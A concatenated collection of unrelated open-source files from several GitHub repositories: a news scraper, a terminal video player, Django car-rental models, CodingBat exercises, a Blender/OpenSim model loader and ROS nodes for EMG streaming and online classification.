[q.put((None, "ad mortem")) for q in processors]
[w.join() for w in processor_processes]
merge(endlocation, [f"temp_file_{i}.csv" for i in range(worker_count)])
print('Procedure finished')
if __name__ == '__main__':
start = time.time()
if len(sys.argv) == 3:
procedure(sys.argv[1], sys.argv[2])
print(time.time() - start)
else:
print(time.time() - start)
sys.exit(1)
``` |
{
"source": "Jonathan-Bonaguro/petrarch2",
"score": 3
} |
#### File: Jonathan-Bonaguro/petrarch2/dw_scraper.py
```python
from __future__ import unicode_literals
from bs4 import BeautifulSoup
import requests
import json
import re
import datetime
from pymongo import MongoClient
connection = MongoClient()
db = connection.event_scrape
collection = db["dw_test"]
url_list = ["http://www.dw.com/search/?languageCode=en&item=refugees&searchNavigationId=9097&sort=RELEVANCE&resultsCounter=1900",
"http://www.dw.com/search/?languageCode=en&item=asylum&searchNavigationId=9097&sort=RELEVANCE&resultsCounter=405"]
#"http://www.dw.com/search/?languageCode=en&item=crime&searchNavigationId=9097&sort=RELEVANCE&resultsCounter=1900",
#"http://www.dw.com/search/?languageCode=en&item=pegida&searchNavigationId=9097&sort=RELEVANCE&resultsCounter=1900",
#"http://www.dw.com/search/?languageCode=en&item=anti-semitism&searchNavigationId=9097&sort=RELEVANCE&resultsCounter=1900",
#"http://www.dw.com/search/?languageCode=en&item=hate crime&searchNavigationId=9097&sort=RELEVANCE&resultsCounter=1900"]
def get_links(url):
headers = {'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"}
result = requests.get(url, headers=headers)
soup = BeautifulSoup(result.content, "lxml")
article_boxes = soup.find_all("div", {"class" : "searchResult"})
link_stubs = []
for a in article_boxes:
b = a.find('a', href = True)
link_stubs.append(b['href'])
links = [''.join(["http://www.dw.com", i]) for i in link_stubs]
links = [i for i in links if re.search("/av-\d+$", i) is None]
links = [i for i in links if re.search("/g-\d+$", i) is None]
return links
# Taken verbatim from https://github.com/openeventdata/scraper/
def _check_mongo(url, db_collection):
"""
Private function to check if a URL appears in the database.
Parameters
----------
url: String.
URL for the news stories to be scraped.
db_collection: pymongo Collection.
Collection within MongoDB that in which results are
stored.
Returns
-------
found: Boolean.
Indicates whether or not a URL was found in the database.
"""
if db_collection.find_one({"url": url}):
found = True
else:
found = False
return found
# Taken verbatim from https://github.com/openeventdata/scraper/
def add_entry(collection, text, title, url, date, website, lang):
"""
Function that creates the dictionary of content to add to a MongoDB
instance, checks whether a given URL is already in the database, and
inserts the new content into the database.
Parameters
----------
collection : pymongo Collection.
Collection within MongoDB that in which results are stored.
text : String.
Text from a given webpage.
title : String.
Title of the news story.
url : String.
URL of the webpage from which the content was pulled.
date : String.
Date pulled from the RSS feed.
website : String.
Nickname of the site from which the content was pulled.
Returns
-------
object_id : String
"""
toInsert = {"url": url,
"title": title,
"source": website,
"date": date,
"date_added": datetime.datetime.utcnow(),
"content": text,
"stanford": 0,
"language": lang}
object_id = collection.insert_one(toInsert)
return object_id
# This is the part that's customized to DW article pages
def scrape_article(article_url, test = False):
if not test and _check_mongo(article_url, collection):
print("Duplicate URL. Skipping...")
return
headers = {'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"}
result = requests.get(article_url, headers=headers)
soup = BeautifulSoup(result.content, "lxml")
try:
body = soup.find("div", {"class" : "longText"}).find_all("p", recursive=False)
# recursive = False keeps it from going into the picture divs and pulling out the captions
# It also gets rid of the social media stuff.
body_trimmed = [i.text for i in body if re.search("<strong>", repr(i)) is None]
article_body = "\n\n".join(body_trimmed)
except Exception as e:
print("Couldn't scrape url {0} with error {1}").format(article_url, e)
return {} # is this the best behavior?
title = soup.find("div", {"id": "bodyContent"}).find("h1").text
try:
date_raw = soup.find("div", {"class" : "col1 dim"}).find("li").text
date_pieces = re.findall("\d+", date_raw)
date_pieces = [int(i) for i in date_pieces]
date = datetime.datetime(date_pieces[2], date_pieces[1], date_pieces[0])
except Exception as e:
print("Problem getting date, returning null. {0}").format(e)
return {}
if not test:
add_entry(collection, article_body, title,
article_url, date, "deutsche_welle",
"english")
if test:
article = {"url": article_url,
"title": title,
"source": "deutsche_welle",
"date": date,
"date_added": datetime.datetime.utcnow(),
"content": article_body,
"stanford": 0,
"language": "english"}
print(article)
if __name__ == "__main__":
results = get_links(url_list[0])
print("Testing on one article:")
scrape_article(results[22], test = True)
print("\n\nNow downloading and loading into Mongo.")
for search in url_list:
results = get_links(search)
for art in results:
scrape_article(art)
print("Complete. The Mongo collection now has {0} articles in it").format(collection.count())
``` |
{
"source": "jonathanbreitg/CLIvideoPlayer",
"score": 3
} |
#### File: jonathanbreitg/CLIvideoPlayer/main.py
```python
import time
import ueberzug.lib.v0 as ueberzug
import cv2
import moviepy.editor as mp
import threading
from termcolor import colored
from slowprint.slowprint import *
import argparse
from pydub import AudioSegment
from pydub.playback import play
import os
from pynput import keyboard as pkeyboard
import keyboard
import pyautogui
parser = argparse.ArgumentParser(description='plays videos fully in the command line')
parser.add_argument('video', metavar='vid', type=str, nargs='+',help='the video to play')
args = parser.parse_args()
vid = args.video[0]
os.system('color')
#slowprint(colored("Made by Bira ❤️ ","magenta",attrs=['reverse','bold']),0.4)
def sound_thread():
global vid
name = vid.split('.')[0]
song = AudioSegment.from_mp3(f'frames//{name}audio.mp3')
play(song)
def on_activate_m():
print('got here')
def listener():
with pkeyboard.GlobalHotKeys({
'f': on_activate_m}) as m:
m.join()
def get_info(vid):
video_capture = cv2.VideoCapture(f"{vid}")
fps = video_capture.get(cv2.CAP_PROP_FPS)
total = int(video_capture.get(cv2.CAP_PROP_FRAME_COUNT))
print(f"{fps} FPS")
return fps,total
def split_vid_to_frames(vid):
global saved_frame_name
name = vid.split('.')[0]
my_clip = mp.VideoFileClip(f"{vid}")
my_clip.audio.write_audiofile(f"frames//{name}audio.mp3")
video_capture = cv2.VideoCapture(f"{vid}")
total = int(video_capture.get(cv2.CAP_PROP_FRAME_COUNT))
saved_frame_name = 0
print(name)
while video_capture.isOpened():
frame_is_read, frame = video_capture.read()
precentage = saved_frame_name / total
print(colored(f"%{precentage*100} done..","yellow"))
if frame_is_read:
cv2.imwrite(f"frames//{name}frame{str(saved_frame_name)}.jpg", frame)
saved_frame_name += 1
else:
print(colored("done","red",attrs=['reverse','bold']))
break
return fps
def play_from_frames(fps,saved_frame_name):
global vid
global saved_frame_nam
i = 0
with ueberzug.Canvas() as c:
name = vid.split('.')[0]
path = f"frames//{name}frame0.jpg"
demo = c.create_placement('demo',x=0, y=0, scaler=ueberzug.ScalerOption.COVER.value)
demo.path = path
demo.visibility = ueberzug.Visibility.VISIBLE
print(type(demo))
while True:
if i >= saved_frame_name:
break
i += 1
time.sleep(1/fps)
demo.path = f"frames//{name}frame{i}.jpg"
os._exit(1)
fps,total = get_info(vid)
splitting_thread = threading.Thread(target=split_vid_to_frames,args=[vid])
splitting_thread.start()
time.sleep(1)
playing_thread = threading.Thread(target=play_from_frames,args=[fps,total])
playing_thread.start()
audio_thread = threading.Thread(target=sound_thread)
audio_thread.start()
playing_thread = threading.Thread(target=play_from_frames,args=[fps,total])
playing_thread.start()
shortcut_thread = threading.Thread(target=listener)
shortcut_thread.start()
``` |
{
"source": "JonathanBritoR/Proyecto-Exoneracion",
"score": 2
} |
#### File: Carrental/rentaCar/models.py
```python
from decimal import Decimal
import shortuuid
from django.core.validators import RegexValidator, MinValueValidator
from django.utils import timezone
from django.db import models
# Create your models here.
from .validations import validar_digito_verificador, validar_vehiculo_rentado
def generar_numero_renta():
return shortuuid.ShortUUID().random(length=7)
class TipodeVehiculo(models.Model):
descripcion = models.CharField(max_length=30)
estado = models.BooleanField(default=False)
def __str__(self):
return self.descripcion
class Meta:
verbose_name = "Tipo de Vehiculo"
verbose_name_plural = "Tipos de Vehiculos"
class Marca(models.Model):
descripcion = models.CharField(max_length=30)
estado = models.BooleanField(default=False)
def __str__(self):
return self.descripcion
class Meta:
verbose_name = "Marca"
verbose_name_plural = "Marcas"
class Modelo(models.Model):
marca = models.ForeignKey(
'Marca',
on_delete=models.CASCADE,
)
descripcion = models.CharField(max_length=30)
estado = models.BooleanField(default=False)
def __str__(self):
return self.descripcion
class Meta:
verbose_name = "Modelo"
verbose_name_plural = "Modelos"
class TipodeCombustible(models.Model):
descripcion = models.CharField(max_length=30)
estado = models.BooleanField(default=False)
def __str__(self):
return self.descripcion
class Meta:
verbose_name = "Tipo de Combustible"
verbose_name_plural = "Tipos de Combustible"
class Vehiculo(models.Model):
descripcion = models.CharField(max_length=30)
numero_de_chasis = models.IntegerField(validators=[MinValueValidator(1)])
numero_de_motor = models.IntegerField(validators=[MinValueValidator(1)])
numero_de_placa = models.IntegerField(validators=[MinValueValidator(1)])
tipo_de_vehiculo = models.ForeignKey(
'TipodeVehiculo',
on_delete=models.CASCADE,
)
marca = models.ForeignKey(
'Marca',
on_delete=models.CASCADE,
)
modelo = models.ForeignKey(
'Modelo',
on_delete=models.CASCADE,
)
tipo_de_combustible = models.ForeignKey(
'TipodeCombustible',
on_delete=models.CASCADE,
)
estado = models.BooleanField(default=True)
def __str__(self):
return self.descripcion
imagen_vehiculo = models.ImageField(null=True, blank=True)
class Meta:
verbose_name = "Vehiculo"
verbose_name_plural = "Vehiculos"
class Cliente(models.Model):
nombre = models.CharField(max_length=40)
cedula = models.CharField(max_length=13, unique=True, validators=[validar_digito_verificador,RegexValidator(regex=r"^\d{3}-\d{7}-\d$",message="Cedula con guiones Ex:(001-0000000-1)")])
numero_tarjeta_de_credito = models.CharField(max_length=13)
limite_de_credito = models.IntegerField(validators=[MinValueValidator(1),])
tipo_de_persona_choices = [
('Jur', 'Juridica'),
('Fis', 'Fisica')
]
tipo_de_persona = models.CharField(max_length=3, choices=tipo_de_persona_choices)
estado = models.BooleanField(default=False)
def __str__(self):
return self.nombre
class Meta:
verbose_name = "Cliente"
verbose_name_plural = "Clientes"
class Empleado(models.Model):
nombre = models.CharField(max_length=40)
cedula = models.CharField(max_length=13, unique=True, validators=[validar_digito_verificador,RegexValidator(regex=r"^\d{3}-\d{7}-\d$",message="Cedula con guiones Ex:(001-0000000-1)")])
tanda_labor_choices = [
('Mat', 'Matutina'),
('Noc', 'Nocturna'),
('Ves', 'Vespertina')
]
tanda_labor = models.CharField(max_length=3, choices=tanda_labor_choices)
porciento_comision = models.IntegerField(validators=[MinValueValidator(1)])
fecha_ingreso = models.DateField(default=timezone.now)
estado = models.BooleanField(default=False)
def __str__(self):
return self.nombre
class Meta:
verbose_name = "Empleado"
verbose_name_plural = "Empleados"
class Inspeccion(models.Model):
vehiculo = models.ForeignKey(
'Vehiculo',
on_delete=models.CASCADE,
)
identificador_cliente = models.ForeignKey(
'Cliente',
on_delete=models.CASCADE,
)
ralladuras = models.BooleanField(default=False)
cantidad_combustible_choices = (
('25%', '1/4'),
('50%', '1/2'),
('75%', '3/4'),
('100%', 'Full')
)
cantidad_combustible = models.CharField(max_length=4, choices=cantidad_combustible_choices)
ralladuras = models.BooleanField(default=False)
goma_de_repuesto = models.BooleanField(default=False)
gato = models.BooleanField(default=False)
roturas_cristal = models.BooleanField(default=False)
estado_gomas = models.BooleanField(default=False)
fecha = models.DateField(default=timezone.now)
empleado_inspeccion = models.ForeignKey(
'Empleado',
on_delete=models.CASCADE,
)
estado = models.BooleanField(default=False)
class Meta:
verbose_name = "Inspeccion"
verbose_name_plural = "Inspecciones"
class RentayDevolucion(models.Model):
#Numero_renta = models.IntegerField(unique=True, validators=[MinValueValidator(1)])
numero_renta = models.CharField(max_length=50, default=generar_numero_renta)
def __str__(self):
return (self.numero_renta)
def save(self, force_insert=False, force_update=False, using=None,
update_fields=None):
if self.pk is None:
self.vehiculo_rentayd.estado = False
self.vehiculo_rentayd.save()
super(RentayDevolucion, self).save(force_insert, force_update, using, update_fields)
empleado_rentayd = models.ForeignKey(
'Empleado',
on_delete=models.CASCADE,
)
vehiculo_rentayd = models.ForeignKey(
'Vehiculo',
on_delete=models.CASCADE,
validators=[validar_vehiculo_rentado]
)
cliente_rentayd = models.ForeignKey(
'Cliente',
on_delete=models.CASCADE,
)
fecha_renta = models.DateTimeField(default= timezone.now)
fecha_devolucion = models.DateTimeField(blank=True, null=True)
monto_por_dia = models.FloatField(validators=[MinValueValidator(1),])
cantidad_de_dias = models.IntegerField(validators=[MinValueValidator(1),])
comentario = models.CharField(max_length=100, null=True, blank=True)
estado = models.BooleanField(default=False)
@property
def total (self):
return Decimal(self.monto_por_dia) * Decimal(self.cantidad_de_dias)
class Meta:
verbose_name = "Renta y Devolucion"
verbose_name_plural = "Rentas y Devoluciones"
``` |
{
"source": "JonathanBuchh/CodingBat",
"score": 4
} |
#### File: CodingBat/Python/Warmup-1.py
```python
def sleep_in(weekday, vacation):
if vacation is True:
return True
if weekday is False:
return True
else:
return False
# monkey_trouble
def monkey_trouble(a_smile, b_smile):
if a_smile and b_smile:
return True
if a_smile is False and b_smile is False:
return True
return False
# sum_double
def sum_double(a, b):
if a is b:
return (a + b)*2
return a + b
# diff21
def diff21(n):
if n > 21:
return abs(21-n)*2
return abs(21-n)
# parrot_trouble
def parrot_trouble(talking, hour):
if talking is True:
if hour < 7 or hour > 20:
return True
return False
# makes10
def makes10(a, b):
if a is 10 or b is 10:
return True
if a + b is 10:
return True
return False
# near_hundred
def near_hundred(n):
if abs(100-n) <= 10 or abs(200-n) <= 10:
return True
return False
# pos_neg
def pos_neg(a, b, negative):
if negative is True:
if a < 0 and b < 0:
return True
return False
if a < 0 and b > 0:
return True
if a > 0 and b < 0:
return True
return False
# not_string
def not_string(str):
if len(str) >= 3 and str[:3] == "not":
return str
return "not " + str
# missing_char
def missing_char(str, n):
return str[:n] + str[n + 1:]
# front_back
def front_back(str):
if len(str) <= 1:
return str
return str[len(str)-1] + str[1:len(str)-1] + str[0]
# front3
def front3(str):
if len(str) < 3:
return str + str + str
triple = str[0:3]
return triple + triple + triple
``` |
{
"source": "JonathanCalderon/ndscheduler",
"score": 3
} |
#### File: corescheduler/core/base_test.py
```python
import unittest
import mock
from ndscheduler.corescheduler.core.base import BaseScheduler
from ndscheduler.corescheduler.datastore.providers.sqlite import DatastoreSqlite
class BaseSchedulerTest(unittest.TestCase):
def test_is_okay_to_run(self):
with mock.patch(('ndscheduler.corescheduler.core.base.'
'BaseScheduler.is_okay_to_run')) as mock_should_run:
mock_should_run.return_value = True
job_stores = {'default': DatastoreSqlite.get_instance()}
dcp = 'ndscheduler.corescheduler.datastore.providers.sqlite.DatastoreSqlite'
sched = BaseScheduler(dcp, jobstores=job_stores)
self.assertNotEqual(sched._process_jobs(), sched.DEFAULT_WAIT_SECONDS)
def test_is_not_okay_to_run(self):
with mock.patch(('ndscheduler.corescheduler.core.base.'
'BaseScheduler.is_okay_to_run')) as mock_should_run:
mock_should_run.return_value = False
job_stores = {'default': DatastoreSqlite.get_instance()}
dcp = 'ndscheduler.corescheduler.datastore.providers.sqlite.DatastoreSqlite'
sched = BaseScheduler(dcp, jobstores=job_stores)
self.assertEqual(sched._process_jobs(), sched.DEFAULT_WAIT_SECONDS)
``` |
{
"source": "JonathanCamargo/BlendOsim",
"score": 2
} |
#### File: BlendOsim/blendosim/model.py
```python
import bpy
from bpy.types import Operator
from bpy.props import FloatVectorProperty
from bpy_extras.object_utils import AddObjectHelper, object_data_add
from mathutils import Vector
import bmesh
import numpy as np
import math
from xml.dom import minidom
import os.path
from blendosim.common import readNames,loadAnimation
defaultOsimPath='C:\\OpenSim 4.0\\Geometry'
def addModel(osimFile,modelRoot='',stlRoot='.',collection=''):
if collection=='':
collection = bpy.data.collections.new('osimModel')
bpy.context.scene.collection.children.link(collection)
if isinstance(collection,str):
collection = bpy.data.collections.new(collection)
bpy.context.scene.collection.children.link(collection)
if modelRoot=='':
modelRoot=os.path.dirname(osimFile)
print('collection:')
print(collection)
xmldoc = minidom.parse(osimFile)
itemlist = xmldoc.getElementsByTagName('BodySet')
bodySet=itemlist[0]
bodies=bodySet.getElementsByTagName('Body')
empties=[0]*len(bodies)
for i,body in enumerate(bodies):
bodyName=body.getAttribute('name')
#create an empty to be the parent of mesh objects
empties[i] = bpy.data.objects.new(bodyName,None)
collection.objects.link(empties[i])
#Read meshes that belong to this body
for i,body in enumerate(bodies):
bodyName=body.getAttribute('name')
meshes=body.getElementsByTagName('Mesh')
for mesh in meshes:
meshName=mesh.getAttribute('name')
files=mesh.getElementsByTagName('mesh_file')
scaleFactorElems=mesh.getElementsByTagName('scale_factors')
scaleFactorStr=scaleFactorElems[0].firstChild.nodeValue
scaleFactor=[float(x) for x in scaleFactorStr.split()]
#print(scaleFactor)
#Create an empty for the mesh to group individual stls into one parent partition
#replace filename to stl to import
file=files[0]
filename=file.firstChild.nodeValue
filename=str.replace(filename,'.vtp','.stl')
#Check if file exists in modelRoot
fullFile=os.path.join(modelRoot,filename)
if not os.path.exists(fullFile):
fullFile=os.path.join(stlRoot,filename)
if not os.path.exists(fullFile):
fullFile=os.path.join(defaultOsimPath,filename)
if not os.path.exists(fullFile):
print(filename+' not found, skipping')
#TODO Here I could check for just vtp and convert to stl.
continue
# rename
for obj in bpy.data.objects:
obj.select_set(False)
bpy.ops.import_mesh.stl(filepath=fullFile)
print(fullFile)
selected_objects = [ o for o in bpy.context.scene.objects if o.select_get() ]
obj=selected_objects[0]
obj.scale=scaleFactor
obj.parent=empties[i]
obj.users_collection[0].objects.unlink(obj)
collection.objects.link(obj)
def loadModel(osimFile,csvFile,modelRoot='',stlRoot='.',collection=''):
if (collection==''):
collection = bpy.data.collections.new('osimModel')
bpy.context.scene.collection.children.link(collection)
addModel(osimFile,modelRoot=modelRoot,stlRoot=stlRoot,collection=collection)
data = np.genfromtxt(csvFile, dtype=float, delimiter=',', names=True,skip_header=0)
objectNames=readNames(data.dtype.names[1:])
loadAnimation(collection,data,objectNames)
#bpy.context.scene.update()
'''
#Example
osimFile='G:\\Dropbox (GaTech)\\PvA\\TestScaling\\OsimXML\\EpicLeg13FullBody_L.osim'
osimPath='G:\Dropbox (GaTech)\cursos\8751\CODE\TerrainPark\CAD\STL\Skeleton'
loadModel(osimFile,stlRoot=osimPath)
'''
``` |
{
"source": "JonathanCamargo/Eris",
"score": 3
} |
#### File: featureextraction/examples/testSubscriber.py
```python
from subscriber import Subscriber #Import the Subscriber class
from time import sleep
import rospy
import signal
import sys
# Remember to do this somewhere in the node where we use anything related to ros
rospy.init_node('somenodename', anonymous=True)
def signal_handler(sig,frame):
''' Terminate the node gracefully'''
print('Ctrl+c')
sys.exit(0)
signal.signal(signal.SIGINT,signal_handler)
#This class can create generic subscribers to our ros topics
somesubscriber=Subscriber('/sometopic','custom_msgs/String')
# The subscriber will be created and we can have acess to information from
# the topic and msg type
print("topic:"+somesubscriber.topic)
print("Channels"+str(somesubscriber.channels))
print("Channel types"+str(somesubscriber.channel_types))
# This info can be just printed using print
print(somesubscriber)
# The subscriber has an internal buffer that can be specified with the argument
# queue_size... Can we just use this instead of the ring buffer? (James)
# To enable the callback just subscribe to the messages and then it will start
# gathering data automatically. e.g.
print("SUBSCRIBING")
somesubscriber.subscribe()
print(somesubscriber)
for i in range(2*60): #Run for 2 minutes to test the callback
q=somesubscriber.getQueue()
print(q)
sleep(1)
```
#### File: python/featureextraction/subscriber.py
```python
import rospy
import threading
import importlib
from collections import deque
from custom_msgs.msg import *
def Subscriber(topic_name,type_str, window):
#creates a subscriber for topic topic_name
#using the class given as a string: type_str
# in the form package_name/message_type
# or in the form package_name.msg.message_type
# alternatively type_str can be passed not as an str, but as the actual msg class
# returns the subscriber instance
try:
if not (type(type_str)==str):
type_str=type_str.__module__
if type(type_str)==str:
if '/' in type_str:
split_type=type_str.split('/')
package_name=split_type[0]
class_name=split_type[1]
if '.' in type_str:
split_type=type_str.split('.')
package_name=split_type[0]
class_name=split_type[2]
class_name=class_name[1:]
module_=importlib.import_module(package_name+'.msg')
data_class=getattr(module_,class_name)
subscriber=GenericSubscriber(topic_name,data_class, window)
except ImportError as e:
print('ERROR in '+package_name+'.msg')
raise ImportError("package %s not found %s"%(package_name,e))
return subscriber
# A generic subscriber class for interfacing any type of message into the GUI
class GenericSubscriber(object):
def __init__(self,topic,data_class,QUEUE_SIZE=1000):
#Properties
self.topic="" # topic name (e.g. /myrobot/someNamespace/somemessage)
self.data_class="" # type of message in the form 'package_name/message_type' e.g. 'custom_msgs/JointState
self.registered = False #indicates if subscriber is registered (i.e. listening to data)
self.paused = False #indicates if subscriber pauses appending data to the queue
self.channels = None
self.queue = deque(maxlen=QUEUE_SIZE) #Queue for saving data
self.subs = None # subscriber object
if topic!="":
self.topic=topic
if data_class!="":
self.topic=topic
self.data_class=data_class
self.channels=self.data_class.__slots__
self.channel_types=self.data_class._slot_types
def callback(self,msg):
if __debug__:
pass
#rospy.loginfo(rospy.get_caller_id()+" %s",msg)
if self.paused==False:
#Get each field in the message
data=[]
for channel in self.channels:
if channel == 'header':
#If header just take the timestamp
time=msg.header.stamp.secs+msg.header.stamp.nsecs/1.0E9
data.append(time)
else:
data.append(getattr(msg,channel))
self.append(data)
def listener(self):
try:
self.subs=rospy.Subscriber(self.topic, self.data_class, self.callback)
except:
print("Could not subscribe")
else:
self.registered=True
def append(self, newElement):
if self.paused == False:
self.queue.append(newElement)
def getQueue(self):
return list(self.queue)
def getChannels(self):
return self.channels
def unsubscribe(self):
if self.subs is not None:
self.subs.unregister()
self.registered=False
def subscribe(self):
if self.registered is False:
self.t=threading.Thread(target=self.listener())
self.t.start()
self.registered=True
def __str__(self):
''' Overload str to use print for the subcriber'''
string_1="Topic: {0}\nChannels:{1}\nChannel types:{2}\n".format(self.topic,self.channels,self.channel_types)
if self.registered is True:
string_2="This subscriber is registered"
else:
string_2="This subscriber is NOT registered"
return string_1+string_2
```
#### File: eris_emg/nodes/eris_emg.py
```python
import rospy
from eris.eris import Eris
from eris.customtypes import Signal1CHSample_t,Signal8CHSample_t, floatSample_t, uint8_tSample_t
from custom_msgs.msg import Signal1CH,Signal8CH, String, Float32, Bool, Float32MultiArray
from std_msgs.msg import Header, MultiArrayDimension
from std_msgs.msg import Float32 as stdmsgsFloat32
from construct import Struct,Float32l,Int8ub
import numpy as np
import signal
import sys
import threading
if rospy.has_param('eris/port'):
port=rospy.get_param('eris/port')
else:
port='/dev/ttyACM0'
##################### ROS MESSAGES AND PUBLISHERS ##############################
emgmsg=Signal8CH()
sinemsg=Float32()
fsrmsg=Signal1CH()
textpub = rospy.Publisher('print', String, queue_size=50)
emgpub = rospy.Publisher('emg', Signal8CH, queue_size=100)
sinepub = rospy.Publisher('sine', Float32, queue_size=100)
t0=0 #global variable to store time reference to linux time
def publishEMG(sample):
'''Publish data for EMG'''
timestamp=sample['timestamp']/1000.0
#print(timestamp)
emgmsg.header=Header(stamp=t0+rospy.Duration(timestamp))
emgmsg.ch0=sample['ch'][0]
emgmsg.ch1=sample['ch'][1]
emgmsg.ch2=sample['ch'][2]
emgmsg.ch3=sample['ch'][3]
emgmsg.ch4=sample['ch'][4]
emgmsg.ch5=sample['ch'][5]
emgmsg.ch6=sample['ch'][6]
emgmsg.ch7=sample['ch'][7]
emgpub.publish(emgmsg)
#print(emgmsg)
def publishSine(sample):
'''Publish data for Sine'''
timestamp=sample['timestamp']/1000.0
sinemsg.header=Header(stamp=t0+rospy.Duration(timestamp))
sinemsg.data=sample['value']
sinepub.publish(sinemsg)
def publishText(data):
textmsg.data = data[0];
textmsg.header=Header(stamp=rospy.Time.now())
textpub.publish(textmsg)
def command_callback(msg):
''' A callback to transmit a command to eris'''
e.sendCommand(msg.data)
################################################################################
#Create an eris object
#What to read from Eris?
streams=['SINE','EMG']
streamsformat=[floatSample_t,Signal8CHSample_t]
e=Eris(streams,streamsformat,port)
######################## HELPER FUNCTIONS ######################################
def signal_handler(sig,frame):
''' Terminate the connection to eris and close the node'''
print('Ctrl+c')
e.stop()
sys.exit(0)
signal.signal(signal.SIGINT,signal_handler)
################################################################################
''' Main loop'''
rospy.init_node('eris_emg', anonymous=True)
cmdsub = rospy.Subscriber('eris/command',String,command_callback)
ROSRATE=50 #Hz
rate = rospy.Rate(ROSRATE)
e.sendCommand('TIME0') #Reset time to 0
t0=rospy.Time.now()
rate.sleep()
print('Inicio')
e.start()
while True:
try:
out = e.read()
except Exception as ex:
print('Problem')
print(ex)
e.sendCommand('S_OFF')
rate.sleep()
e.sendCommand('S_ON')
rate.sleep()
continue
for p in out['D']:
for sample in p['SINE']:
publishSine(sample)
for sample in p['EMG']:
publishEMG(sample)
#rospy.loginfo_once("This message will print only once")
rate.sleep()
e.sendCommand('S_OFF')
e.stop()
```
#### File: ml/nodes/classifier.py
```python
import rospy
import numpy as np
import signal
import sys
import threading
import os
from EpicToolbox import FileManager,mkdirfile
from std_msgs.msg import String as StdString
from std_msgs.msg import Header
from custom_msgs.msg import String, Float32MultiArray
from datetime import date
# MODEL DEPENDENT CODE ? WRAP TO CLASS?
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import accuracy_score
from sklearn.model_selection import KFold
from joblib import dump, load
from copy import deepcopy
from scipy import io
##################### ROS MESSAGES AND PUBLISHERS ##############################
stringmsg=String()
std_stringmsg=StdString()
labelpub = rospy.Publisher('prediction',String,queue_size=1)
logpub = rospy.Publisher('log', StdString, queue_size=50)
################################################################################
labels=[]
label=None
active_model=None
lock=threading.Lock()
learning = False
MAX_SAMPLES=100 #Number of samples per class to hold in memory
size=None #Size of the feature vector
memory=dict() #Sample data
numSamples=dict() #Number of samples
VERBOSE=2
# Setup a Rosbag
path=os.path.join(os.environ['HOME'],date.today().strftime('%m_%d_%y'))
mkdirfile(path)
f=FileManager(path,PathStructure=['Type','File'])
#rosparam=Rosparam('/')
############################ ROS CALLBACKS #####################################
def learning_callback(msg):
'''Enable or disable learning'''
global learning
if msg.data=='START':
printAndLog('Learning enabled')
learning=True
elif msg.data=='STOP':
printAndLog('Learning disabled')
learning=False
def label_callback(msg):
global labels,label,size,memory,numSamples,active_model
print('Label:{}'.format(msg.data))
lock.acquire()
label=msg.data
if label in labels:
pass
else:
print('\t New label to the classifier')
if size==None:
lock.release()
return
labels.append(label)
memory[label]=np.zeros((MAX_SAMPLES,size))
numSamples[label]=0
active_model=None #Reset the model since the number of labels changed
lock.release()
def labelstd_callback(msg):
stringmsg.header.stamp=rospy.Time.now()
stringmsg.data=msg.data
label_callback(stringmsg)
def features_callback(msg):
''' Get a new feature sample and incorporate the sample in memory'''
global active_model,labels,label,memory,numSamples,size,learning
if learning == False:
size=msg.layout.dim[0].size
if learning == True:
lock.acquire()
if label==None:
size=msg.layout.dim[0].size
lock.release()
return
# Add the sample to the buffers for the corresponding label
x=memory[label]
idx=numSamples[label]
if idx<MAX_SAMPLES:
x[idx,:]=msg.data
numSamples[label]=numSamples[label]+1
else:
x=np.roll(x,1,axis=0)
x[0,:]=msg.data
memory[label]=x
numSamples[label]=numSamples[label]+1
lock.release()
# Compute the prediction from the active model
if active_model==None:
return
lock.acquire()
out=active_model.predict(np.array([msg.data]))
lock.release()
stringmsg.header.stamp=rospy.Time.now()
stringmsg.data=out[0]
labelpub.publish(stringmsg)
#publish output
######################## HELPER FUNCTIONS ######################################
def signal_handler(sig,frame):
''' Terminate the connection to eris and close the node'''
print('Ctrl+c')
rosbag.stop()
sys.exit(0)
signal.signal(signal.SIGINT,signal_handler)
def printAndLog(strdata):
''' Print and publish string data to the log '''
print(strdata)
std_stringmsg.data=strdata
logpub.publish(std_stringmsg)
def memory2xy(memory):
'''Convert the data from memory to a x,y tables for fitting a model'''
labels=memory.keys()
x=[]
y=[]
for l in labels:
x.append(memory[l])
y.append([l]*memory[l].shape[0])
x=np.concatenate(x)
y=np.concatenate(y)
return x,y
def retrain(memory):
global active_model
mdl = deepcopy(active_model)
x,y=memory2xy(memory)
mdl.partial_fit(x,y)
return mdl
def train(memory):
lr=0.05
tol=0.001
mdl=MLPClassifier(hidden_layer_sizes=(10,10),max_iter=300,learning_rate_init=lr,tol=tol,verbose=VERBOSE)
x,y=memory2xy(memory)
mdl.fit(x,y)
return mdl
def CheckPoint():
global active_model,memory
'''Save a copy of the current model and the data in memory'''
modelfiles=f.fileList({'Type':'model','File':'*.mdl'})
nextmodel=f.genList({'Type':'model','File':'{:01d}.mdl'.format(len(modelfiles)+1)})
nextmemory=f.modFileList(nextmodel,{'Type':'memory','ext':'mat'})
#Save the model
printAndLog('Model checkpoint ({})'.format(nextmodel[0]))
print(nextmemory)
mkdirfile(nextmemory[0])
mkdirfile(nextmodel[0])
dump(active_model,nextmodel[0])
io.savemat(nextmemory[0],{'data':memory})
################################################################################
''' Main loop'''
rospy.init_node('classifier', anonymous=True)
labelsub = rospy.Subscriber('label',String,label_callback)
labelstdsub = rospy.Subscriber('labelstd',StdString,labelstd_callback)
learningsub = rospy.Subscriber('train',String,learning_callback)
learningstdsub = rospy.Subscriber('trainstd',StdString,learning_callback)
featuressub = rospy.Subscriber('features',Float32MultiArray,features_callback)
ROSRATE= 1 #Hz
rate = rospy.Rate(ROSRATE)
rate.sleep()
elapsed=0
lasttime=rospy.Time.now()
# Restore from previous model
models=f.fileList({'Type':'model','File':'*.mdl'})
if len(models)>0:
print('Previous models found:\n\t{}'.format(models))
memoryfiles=f.modFileList(models,{'Type':'memory','ext':'mat'})
active_model=load(models[-1])
memory=io.loadmat(memoryfiles[-1])
print(memory.keys())
count=0
while True:
time=rospy.Time.now()
if ((not label==None) and (label in numSamples.keys())):
printAndLog('label={}({}samples)'.format(label,numSamples[label]))
if labels==[]:
rate.sleep()
continue
n=[numSamples[l] for l in labels]
print(n)
